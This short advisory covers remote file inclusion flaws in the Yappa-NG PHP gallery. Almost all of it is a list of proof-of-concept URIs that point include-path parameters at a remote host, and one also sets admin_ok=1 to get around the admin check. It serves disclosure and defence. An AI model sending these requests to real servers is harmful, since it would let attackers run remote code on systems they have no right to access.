Yappa-NG Unspecified Remote File Include Vulnerability

Yappa-NG Unspecified Remote File Include Vulnerability

There is no exploit required.

The following proof of concept URI are available:
http://www.example.com/admin_modules/admin_module_captions.inc.php?config[path_src_include]=http://www.example.com/
http://www.example.com/admin_modules/admin_module_rotimage.inc.php?config[path_src_include]=http://www.example.com/
http://www.example.com/admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=http://www.example.com/
http://www.example.com/admin_modules/admin_module_edit.inc.php?config[path_src_include]=http://www.example.com/
http://www.example.com/admin_modules/admin_module_delimage.inc.php?config[path_src_include]=http://www.example.com/
http://www.example.com/admin_modules/admin_module_deldir.inc.php?config[path_src_include]=http://www.example.com/
http://www.example.com/src/index_overview.inc.php?config[path_src_include]=http://www.example.com/
http://www.example.com/src/index_leftnavbar.inc.php?config[path_src_include]=http://www.example.com/&config[show_album_desc_prev]=yes
http://www.example.com/src/index_image.inc.php?config[path_src_include]=http://www.example.com/&config[show_comments]=1&config_album[show_comments]=1
http://www.example.com/src/image-gd.class.php?config[path_src_include]=http://www.example.com/
http://www.example.com/src/image.class.php?config[path_src_include]=http://www.example.com/&config[image_module]=blah
http://www.example.com/src/album.class.php?config[path_src_include]=http://www.example.com/
http://www.example.com/src/show_random.inc.php?config[path_src_include]=http://www.example.com/
http://www.example.com/src/main.inc.php?config[path_src_include]=http://www.example.com/
http://www.example.com/src/index_passwd-admin.inc.php?admin_ok=1&config[path_admin_include]=http://www.example.com/